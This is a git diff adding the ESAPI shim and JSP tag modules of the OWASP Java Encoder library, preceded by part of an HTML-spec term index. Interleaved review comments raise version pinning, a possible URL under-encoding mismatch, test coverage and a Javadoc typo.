+spins\n the event loop +split it on\n spaces +split on\n spaces +split on\n spaces +split on spaces +split the\n attribute's value on spaces +split the\n string on commas +split the attribute value on commas +split the attribute's\n value on spaces +split the content\n attribute on spaces +splitting value on spaces +splitting on commas +src +srcdoc +srclang +stack\n of open elements +stack\n of open elements +stack of\n open elements +stack of\n open elements +stack of\n open elements +stack of 
open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open elements +stall timeout +stalled +standby +start +start\n tag +start\n times +start tag +start time +start times +startOffsetTime +startTime +state +state\n objects +state object +state objects +statically validate the\n constraints +status +statusbar +step +step\n base +step base +step scale\n factor +step scale factor +stepDown +stepDown() +stepMismatch +stepUp +stepUp() +steps to expose a\n media-resource-specific text track +stop +stop parsing +stopped +stopped due to errors +stopped parsing +stops +stops\n parsing +storage\n mutex +storage mutex +strictly splitting the\n string +strike +strip leading\n and trailing whitespace +strip leading and\n trailing whitespace +strip leading and\n trailing whitespace +stripped line breaks +stripping leading and trailing whitespace +strong +structured\n clone +structured\n clone +structured clone +style +style rule suggested in the rendering\n section +style sheet\n ready +style sheet ready +stylesheet +styling processing\n model +styling processing model +sub +submit +submit\n button +submit\n buttons +submit button +submit buttons +submit() +submittable +submittable elements +submitted +submitting +subscribe +subtitle +subtitles +suffer from a step\n mismatch +suffer from a step mismatch +suffering from a\n type mismatch +suffering from a custom\n error +suffering from a custom error +suffering from a pattern mismatch +suffering from a step mismatch +suffering from a type mismatch +suffering from an\n overflow +suffering from an\n underflow +suffering from an overflow +suffering from an underflow +suffering from being\n missing +suffering from being missing +suffering from being too long +suggestions\n source element +suggestions source\n element +suggestions source element +summary +sup +support the scripting\n language +supported\n property names +supported property\n indices 
+supported property indices +supported property names +supporting the suggested\n default rendering +suspend +svg +swapCache +swapCache() +synchronous\n section +synchronous\n section +synchronous\n sections +synchronous\n section +synchronous section +synchronous sections +syntax for which +tBodies +tFoot +tHead +tabIndex +tabindex +table +table\n model +table layout techniques +table model +table model\n errors +table model error +tables +tag +tag\n name state +tag cloud +tag name +tag name\n state +tag open state +tags +target +target element +task +task\n queue +task\n queue +task\n queues +task\n queues +task\n source +task\n queue +task queue +task queues +task source +task sources +tasks +tbody +td +techniques for describing\n tables +tel +temporary\n buffer +temporary buffer +term +text +text\n track cue writing direction +text\n track +text\n track cue writing direction +text\n track +text\n nodes +text\n track +text\n track cue active flag +text\n track kind +text\n tracks +text\n node +text\n track +text\n track cue size +text\n track cue writing direction +text\n track mode +text\n tracks +text field +text node +text nodes +text track +text track\n cue +text track\n mode +text track\n cue order +text track\n cues +text track\n cue +text track\n cue display state +text track\n cue start time +text track\n kind +text track\n label +text track\n mode +text track\n cue +text track\n cues +text track\n mode +text track\n readiness state +text track cue +text track cue\n display state +text track cue\n pause-on-exit flag +text track cue\n active flag +text track cue\n end time +text track cue\n identifier +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n start time +text track cue\n text +text track cue\n writing direction +text track cue\n identifier +text track cue\n order +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n text +text track cue active\n flag +text track cue active\n flag +text track cue 
active flag +text track cue display state +text track cue end\n time +text track cue end\n time +text track cue end time +text track cue identifier +text track cue order +text track cue pause-on-exit\n flag +text track cue pause-on-exit\n flag +text track cue pause-on-exit flag +text track cue size +text track cue start\n time +text track cue start\n time +text track cue start time +text track cue text +text track cue writing\n direction +text track cue writing direction +text track cues +text track disabled +text track failed to load +text track hidden +text track kind +text track label +text track language +text track list of cues +text track loaded +text track loading +text track mode +text track not loaded +text track readiness\n state +text track readiness\n state +text track readiness state +text track showing +text tracks +text-level semantics\n usage summary +text/cache-manifest +text/html +text/plain +textContent +textLength +textPosition +textTracks +textTracks[ +textarea +textarea effective height +textarea effective width +tfoot +th +that algorithm +the\n resource's Content-Type metadata +the\n script block's type +the\n script block's type +the\n resource's Content-Type metadata +the\n directionality +the\n document's address +the\n title element +the\n address +the\n directionality +the\n document's current address +the\n script block's type +the\n title element +the\n conditions described above +the\n incumbent body element +the\n html element +the\n HTML syntax +the\n active formatting elements are reconstructed +the\n body element +the\n directionality +the\n document's address +the\n document's current address +the\n drag data item kind +the\n link is an alternative stylesheet +the\n rules for choosing a browsing context given a browsing context\n name +the\n script settings determined from the node +the Document's address +the applet\n element +the embed element +the head\n element +the head element +the html element +the object element +the 
title\n element +the title element +the origin it was\n assigned when its browsing context was created +the HTML\n syntax +the HTML syntax +the URL given by this\n link +the W3C CVS server +the XHTML\n syntax +the XHTML\n syntax +the XHTML syntax +the attributes common to all media\n elements +the body\n element +the body\n element +the body\n element +the body element +the current address +the directionality +the document's\n address +the document's\n current address +the document's\n address +the document's address +the document's current\n address +the document's current address +the document's domain +the drag data\n item type string +the drag data item\n kind +the drag data item\n kind +the drag data item\n kind +the drag data item kind +the drag data item type\n string +the drag data item type string +the encoding of the\n document itself +the event handler processing algorithm +the example in the File\n Upload state section +the handling for misnested tags +the indicated part of the\n document +the indicated part of the\n document +the indicated part of the document +the link is an\n alternative stylesheet +the location bar BarProp\n object +the manifest +the menu bar BarProp\n object +the next step +the personal bar BarProp\n object +the rendering section +the requirements given in the prose +the resource's Content-Type\n metadata +the resource's Content-Type\n metadata +the rules\n described previously +the rules for choosing a\n browsing context given a browsing context name +the rules for choosing a browsing context given a\n browsing context name +the rules for choosing a browsing context given a browsing\n context name +the script\n block's type +the script\n settings determined from the node +the script block's\n character encoding +the script block's\n type +the script block's\n type +the script block's character encoding +the script block's fallback character\n encoding +the script block's fallback character\n encoding +the script block's source 
+the script block's type +the scrollbar BarProp\n object +the section on\n footnotes +the section the linking element is most\n closely associated with +the sniffed type of the resource +the stack +the status bar BarProp\n object +the step labeled\n "fragment identifiers" +the text tracks are ready +the toolbar BarProp\n object +thead +their document's current\n address +this +this is\n a reference, not a copy +this is a reference, not a copy +through which +time +time-zone\n offset +time-zone offset +timeline\n offset +timeline offset +timeupdate +title +toBlob +toDataURL +toDataURL() +toggle +tokenization +tokenizer +tooLong +toolbar +top +top-level\n browsing context +top-level\n browsing context +top-level\n browsing context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n contexts +top-level browsing context +top-level browsing contexts +tr +track +track\n URL +track\n label +track URL +track label +track language +trademark +transparent +transparently follow the redirect +traverse the\n history by a delta +traverse the history by\n a delta +traverse the history by a\n delta +traverse the history by a delta +traversing the\n history +tree\n order +tree\n order +tree\n construction +tree\n order +tree construction +tree order +true-by-default +trueSpeed +truespeed +trusted +tt +turn off +turned off +turned on +type +type\n sniffing rules +type blacklist +type information +type string +typeMismatch +typeMustMatch +typemustmatch +types +u +ul +unavailable +undo transaction history +unfocusing\n steps +unfocusing steps +unique\n identifier +unique identifier +unique identifier (ID) +unit\n of related similar-origin browsing contexts +unit of\n related similar-origin browsing contexts +unit of related browsing\n contexts +unit of related browsing contexts +unit of related similar-origin browsing\n contexts +unit of related similar-origin browsing contexts +unload a\n 
document +unload a document +unloading document cleanup steps +unordered\n set of unique space-separated tokens +unordered set of unique\n space-separated tokens +unordered set of unique space-separated tokens +unquoted +unregisterContentHandler +unregisterProtocolHandler +up +update +update\n status +update status +update the\n image data +update the\n session history with the new page +update the image data +update the session\n history with the new page +update the session history with\n the new page +update the session history with the new\n page +update the session history with the new page +updated the image\n data +updateready +updating the session history with\n the new page +upgrade\n attempt +upgrade\n attempt +upgrade attempt +use the plugin that supports resource type +use-credentials +useMap +used during the parsing +usemap +user\n interaction task source +user interaction +user interaction task\n source +user interaction task\n source +user interaction task source +userAgent +using the\n rules for +using the rules for +vAlign +vCard MIME Directory\n Profile +vLink +valid +valid\n URL +valid\n integer +valid\n MIME type +valid\n date string +valid\n date string in content with optional time +valid\n floating point number +valid\n floating point numbers +valid\n forced-UTC global date and time string +valid\n global date and time string +valid\n integer +valid\n local date and time string +valid\n media query +valid\n month string +valid\n non-empty URL potentially surrounded by spaces +valid\n non-negative integers +valid\n simple color +valid\n time string +valid\n week string +valid MIME\n type +valid MIME type +valid MIME type with no parameters +valid MIME types with no parameters +valid URL +valid URL\n potentially surrounded by spaces +valid URL potentially\n surrounded by spaces +valid URL potentially surrounded by\n spaces +valid browsing\n context name or keyword +valid browsing\n context names or keywords +valid browsing context\n name +valid 
browsing context\n name or keyword +valid browsing context name +valid browsing context name\n or keyword +valid date\n string +valid date or\n time string +valid date or time string +valid date or time string in content +valid date string +valid date string with\n optional time +valid date string with optional\n time +valid e-mail address +valid e-mail address\n list +valid e-mail address list +valid floating\n point number +valid floating point\n number +valid floating point\n numbers +valid floating point number +valid floating point numbers +valid forced-UTC\n global date and time string +valid forced-UTC global date and time\n string +valid global\n date and time string +valid global date and\n time strings +valid global date and\n time string +valid global date and time\n string +valid global date and time string +valid hash-name reference +valid integer +valid integers +valid list of\n integers +valid local date and\n time string +valid local date and time\n string +valid local date and time string +valid lowercase simple color +valid media query +valid month\n string +valid month string +valid non-empty\n URL potentially surrounded by spaces +valid non-empty URL +valid non-empty URL potentially\n surrounded by spaces +valid non-empty URL potentially surrounded by\n spaces +valid non-negative\n integer +valid non-negative\n integers +valid non-negative integer +valid simple color +valid time\n string +valid time string +valid week\n string +valid week string +validationMessage +validity +validity states +valign +value +value\n sanitization algorithm +value mode\n flag +value mode flag +value sanitization\n algorithm +value sanitization\n algorithm +value sanitization algorithm +values +valueAsDate +valueAsDate +valueAsNumber +valueMissing +valueType +values +values are\n reset +valuetype +var +various W3C HTML WG\n lists +various WHATWG lists +version +vertical\n growing right +vertical growing\n left +vertical growing\n right +vertical growing\n left 
+vertical growing left +vertical growing right +video +videoHeight +videoTracks +videoWidth +violation +visible +vlink +vlinkColor +void elements +volume +volumechange +vspace +waiting +wbr +web developer edition +week +week number of\n the last day +week number of the last day +whatwg@whatwg.org +when the metadata of the clip becomes\n known +whitelisted scheme +whitespace +whitespace trimming +width +width of the\n select's labels +will +will\n not +will be fired +will cause +willValidate +willful\n violation +willful violation +window +window.alert() +window.applicationCache +window.close() +window.open() +wrap +write +writeln +writing direction +xml:base +xml:lang +xmp +yet more restrictions +yieldForStorageUpdates diff --git a/esapi/pom.xml b/esapi/pom.xml new file mode 100644 index 0000000..531afbb --- /dev/null +++ b/esapi/pom.xml 
@@ -0,0 +1,224 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder-esapi + 1.2-SNAPSHOT + jar + + OWASP Encoders ESAPI Thunk + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. + + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + org.owasp.esapi + esapi + [2.0,3) + + + junit + junit + 3.8.1 + test + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + 
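Review bot: The ESAPI dependency in the dependencies section is declared with the open version range `[2.0,3)` (`org.owasp.esapi esapi [2.0,3)`), so every build resolves whatever 2.x artifact the repository offers at that moment; the build is not reproducible and a newly published 2.x release is pulled in without anyone reviewing it. Pin it to the release actually tested, e.g. `<version>ESAPI_VERSION_PLACEHOLDER</version>`, and bump deliberately like the other coordinates in this file. The element names are stripped in this rendering, so the structure is read from the surviving values.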
diff --git a/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java new file mode 100644 index 0000000..0f00de0 --- /dev/null +++ b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java 
@@ -0,0 +1,240 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.esapi;
+
+import java.io.IOException;
+import org.owasp.encoder.Encode;
+import org.owasp.esapi.Encoder;
+import org.owasp.esapi.codecs.Codec;
+import org.owasp.esapi.errors.EncodingException;
+import org.owasp.esapi.reference.DefaultEncoder;
+
+/**
+ * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API.
It + * is meant to allow quick and easy drop-in replacement of the default + * encoder included with the ESAPI library, as the Encoder libraries are + * faster and use less memory thus cause fewer garbage collections. + * + *

    Please note that the OWASP Java Encoders does not implement all + * the encodings of the ESAPI Encoder API. In such situations this + * implementation will fallback onto the default reference implementation + * included with ESAPI. Thus you should see the performance benefit from + * the methods included in the Encoder, but still maintain compatibility + * with all methods from ESAPI Encoder.

    + * + *

    For clarity, the reason the OWASP Java Encoders do not include some + * of the ESAPI library is that the Encoders library is specifically focused + * on encoding, and thus does not include:

    + * + *
      + *
    • Input validation/normalization methods: + * {@link org.owasp.esapi.Encoder#canonicalize(String)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)}
    • + * + *
    • Decoding methods: + * {@link org.owasp.esapi.Encoder#decodeForHTML(String)}, + * {@link org.owasp.esapi.Encoder#decodeFromURL(String)}
    • + * + *
    • Binary-to-text/text-to-binary: + * {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)}, + * {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}.
    • + * + *
    • Bind-able APIs (such as {@link java.sql.PreparedStatement}: + * {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)}, + * {@link org.owasp.esapi.Encoder#encodeForXPath(String)}, + * {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}
    • + * + *
    • Rarely-used or alternate compatible encoding: + * {@link org.owasp.esapi.Encoder#encodeForVBScript(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String)}, + * {@link org.owasp.esapi.Encoder#encodeForDN(String)}
    • + *
    + * + *

    (Please note that with sufficient feedback from the user base, the above + * mentioned methods may be implemented in future releases of the OWASP + * Java Encoders, if/when that happens, this shim class will be updated to + * call out to the new methods.)

    + * + *

    You may notice that this class does not actually implement Encoder + * itself. Instead it simply provides a {@link #getInstance()} method that + * does. This allows the implementation details maximum flexibility by not + * creating a any public API that would restrict changes later

    + * + * @author jeffi + */ +public final class ESAPIEncoder { + + /** No instances. */ + private ESAPIEncoder() {} + + /** + * Returns an instance of the Encoder. This method is the only supported + * mechanism by which an ESAPIEncoder instance should be obtained. The + * returned implementation is guaranteed to be thread-safe for the methods + * that the OWASP Java Encoders implement (see class documentation). + * Though not a requirement of the ESAPI Encoder API, the returned value + * is also serializable. + * + * @return An encoder implementation that uses the OWASP Java Encoders + * for most of the common encoding methods. + */ + public static Encoder getInstance() { + return Impl.INSTANCE; + } + + /** + * This is the private singleton that implements the ESAPI Encoder shim. + * It is implemented as a single-value enum to get all the "free" singleton + * properties associated with enums--such as serialization, and on-demand + * initialization. + * + *

    The implementation is intentionally private to avoid any API baggage. + * The instance should be obtained using + * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.

    + */
+ private enum Impl implements Encoder {
+ /**
+ * The singleton instance.
+ */
+ INSTANCE;
+
+ /**
+ * The reference encoder from ESAPI. Any ESAPI method without an
+ * OWASP Java Encoder equivalent is delegated to this instance.
+ */
+ private final Encoder _referenceEncoder = DefaultEncoder.getInstance();
+
+ /** {@inheritDoc} */
+ public String canonicalize(String s) {
+ return _referenceEncoder.canonicalize(s);
+ }
+
+ /** {@inheritDoc} */
+ public String canonicalize(String s, boolean strict) {
+ return _referenceEncoder.canonicalize(s, strict);
+ }
+
+ /** {@inheritDoc} */
+ public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) {
+ return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForCSS(String s) {
+ return Encode.forCssString(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForHTML(String s) {
+ return Encode.forHtml(s);
+ }
+
+ /** {@inheritDoc} */
+ public String decodeForHTML(String s) {
+ return _referenceEncoder.decodeForHTML(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForHTMLAttribute(String s) {
+ return Encode.forHtmlAttribute(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForJavaScript(String s) {
+ return Encode.forJavaScript(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForVBScript(String s) {
+ return _referenceEncoder.encodeForVBScript(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForSQL(Codec codec, String s) {
+ return _referenceEncoder.encodeForSQL(codec, s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForOS(Codec codec, String s) {
+ return _referenceEncoder.encodeForOS(codec, s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForLDAP(String s) {
+ return _referenceEncoder.encodeForLDAP(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForDN(String s) {
+ return _referenceEncoder.encodeForDN(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForXPath(String s) {
+ return _referenceEncoder.encodeForXPath(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForXML(String s) {
+ return Encode.forXml(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForXMLAttribute(String s) {
+ return Encode.forXmlAttribute(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForURL(String s) throws EncodingException {
+ return Encode.forUri(s);
+ }
+
+ /** {@inheritDoc} */
+ public String decodeFromURL(String s) throws EncodingException {
+ return _referenceEncoder.decodeFromURL(s);
+ }
+
+ /** {@inheritDoc} */
+ public String encodeForBase64(byte[] bytes, boolean wrap) {
+ return _referenceEncoder.encodeForBase64(bytes, wrap);
+ }
+
+ /** {@inheritDoc} */
+ public byte[] decodeFromBase64(String s) throws IOException {
+ return _referenceEncoder.decodeFromBase64(s);
+ }
+ }
+}
diff --git a/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java
new file mode 100644
index 0000000..7443996
--- /dev/null
+++ b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java
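Review bot: `encodeForURL` is mapped to `Encode.forUri(s)`, which as I read the two contracts under-encodes relative to ESAPI's `encodeForURL`: the ESAPI method is documented as URL-encoding the entire string (URLEncoder-style, suitable for a query-parameter value), whereas `Encode.forUri` treats its argument as an already-formed URI and leaves structural characters such as `&`, `=`, `?` and `/` untouched. An application that swapped in this shim to escape a parameter value would therefore get those delimiters back unescaped, which is a parameter-injection risk rather than a mere formatting difference. `Encode.forUriComponent(s)` matches the ESAPI contract more closely; if `forUri` is kept on purpose, the divergence should be stated in that method's Javadoc instead of `{@inheritDoc}`. The class-level Javadoc also promises thread-safety only for the methods the OWASP encoders implement, so a sentence noting that the delegated methods inherit whatever `DefaultEncoder.getInstance()` guarantees would complete the contract.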
@@ -0,0 +1,49 @@
+package org.owasp.encoder.esapi;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+import org.owasp.esapi.ESAPI;
+import org.owasp.esapi.Encoder;
+
+/**
+ * ESAPIEncoderTest
+ *
+ * @author jeffi
+ */
+public class ESAPIEncoderTest extends TestCase {
+ public static Test suite() {
+ return new TestSuite(ESAPIEncoderTest.class);
+ }
+
+ public void testEncode() throws Exception {
+ // Note: ESAPI reference encodes as: "<>&Ω"
+ // That's 25 characters to OWASP Java Encoder's 14.
+ assertEquals("<>&\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9"));
+ }
+
+ public void testSerialization() throws Exception {
+ // Note: ESAPI reference implementation is NOT serializable. Maybe
+ // it will be in the future. Our implementation is however
+ // guaranteed serializable.
+
+ Encoder encoder = ESAPI.encoder();
+
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+
+ ObjectOutputStream oos = new ObjectOutputStream(baos);
+ oos.writeObject(encoder);
+ oos.close();
+
+ ObjectInputStream ois = new ObjectInputStream(
+ new ByteArrayInputStream(baos.toByteArray()));
+
+ Encoder deserializedEncoder = (Encoder)ois.readObject();
+
+ assertSame(encoder, deserializedEncoder);
+ }
+}
diff --git a/esapi/src/test/resources/.esapi/ESAPI.properties b/esapi/src/test/resources/.esapi/ESAPI.properties
new file mode 100644
index 0000000..bdffd2a
--- /dev/null
+++ b/esapi/src/test/resources/.esapi/ESAPI.properties
@@ -0,0 +1 @@
+ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder
\ No newline at end of file
diff --git a/jsp/pom.xml b/jsp/pom.xml
new file mode 100644
index 0000000..5d53304
--- /dev/null
+++ b/jsp/pom.xml
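Review bot: `testEncode` pins only `encodeForXML`, so a mis-routed delegation in `ESAPIEncoder.Impl` — a context method forwarded to the wrong `Encode` function, or `encodeForURL` encoding less than the ESAPI contract expects — would pass this suite unnoticed. Add one assertion per mapped method with an input containing the characters that context must escape, e.g. `assertEquals(Encode.forHtmlAttribute("\"'<&"), ESAPI.encoder().encodeForHTMLAttribute("\"'<&"));`, plus `assertSame(ESAPIEncoder.getInstance(), ESAPI.encoder());` so the test proves the `ESAPI.Encoder` entry in the accompanying `ESAPI.properties` actually selects the shim rather than the reference encoder. `oos` and `ois` are not closed on the failure path, but with in-memory streams in a test that is cosmetic.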
@@ -0,0 +1,243 @@ + + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2-SNAPSHOT + + + encoder-jsp + 1.2-SNAPSHOT + jar + + OWASP Encoders JSP tags and EL functions + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.12 + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.2 + + + 85 + 85 + false + 85 + 85 + 85 + 85 + + + + + + clean + + + + + + org.apache.maven.plugins + maven-site-plugin + 3.2 + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.6 + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + 1.3.1 + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + 2.3 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.12.4 + + + + report-only + failsafe-report-only + + + + + + org.codehaus.mojo + cobertura-maven-plugin + 2.5.1 + + + org.apache.maven.plugins + maven-pmd-plugin + 2.7.1 + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + 2.9 + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + 2.9.1 + + ../checkstyle.xml + basedir=${basedir}/.. 
+ + + + org.codehaus.mojo + findbugs-maven-plugin + 2.5.2 + + + + + + + + + + org.owasp.encoder + encoder + 1.2-SNAPSHOT + + + junit + junit + 3.8.1 + test + + + javax.servlet.jsp + javax.servlet.jsp-api + 2.2.1 + true + + + javax.servlet + javax.servlet-api + 3.0.1 + test + + + org.springframework + spring-test + 3.1.3.RELEASE + test + + + org.springframework + spring-core + 3.1.3.RELEASE + test + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java new file mode 100644 index 0000000..369b001 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java 
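Review bot: The `javax.servlet.jsp javax.servlet.jsp-api 2.2.1` dependency appears to carry a bare `true` flag (read as `<optional>true</optional>`; element names are stripped in this rendering) rather than `<scope>provided</scope>`. For a tag library the JSP API is supplied by the container, and `provided` both documents that intent and keeps the artifact off the packaged runtime classpath, whereas `optional` only suppresses transitive propagation. If the flag is indeed `optional`, consider switching it to `<scope>provided</scope>` to match the `test`-scoped servlet API declared just below it.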
@@ -0,0 +1,57 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import javax.servlet.jsp.tagext.SimpleTagSupport;
+
+/**
+ * The base class for the encoding tags within tihs package.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public abstract class EncodingTag extends SimpleTagSupport {
+ /**
+ * The value to be written out by the tag.
+ */
+ protected String _value;
+ /**
+ * Sets the value to be written out by the tag.
+ * @param value the value to be written out by the tag.
+ */
+ public void setValue(String value) {
+ this._value = value;
+ }
+
+}
diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java
new file mode 100644
index 0000000..23db285
--- /dev/null
+++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java
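Review bot: The class Javadoc has a typo, `within tihs package` → `within this package`. The `_value` field's Javadoc should also make clear that it holds the raw, not-yet-encoded attribute value and that encoding happens in each subclass's `doTag`, since a reader of the base class alone cannot tell which side is responsible, e.g. `/** The raw (unencoded) value to be written out by the tag; subclasses encode it in doTag. */`. What the tags do when the attribute is never set (`_value == null`) is not stated anywhere in this hunk and would be worth documenting once the subclasses' behaviour is confirmed.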
@@ -0,0 +1,52 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
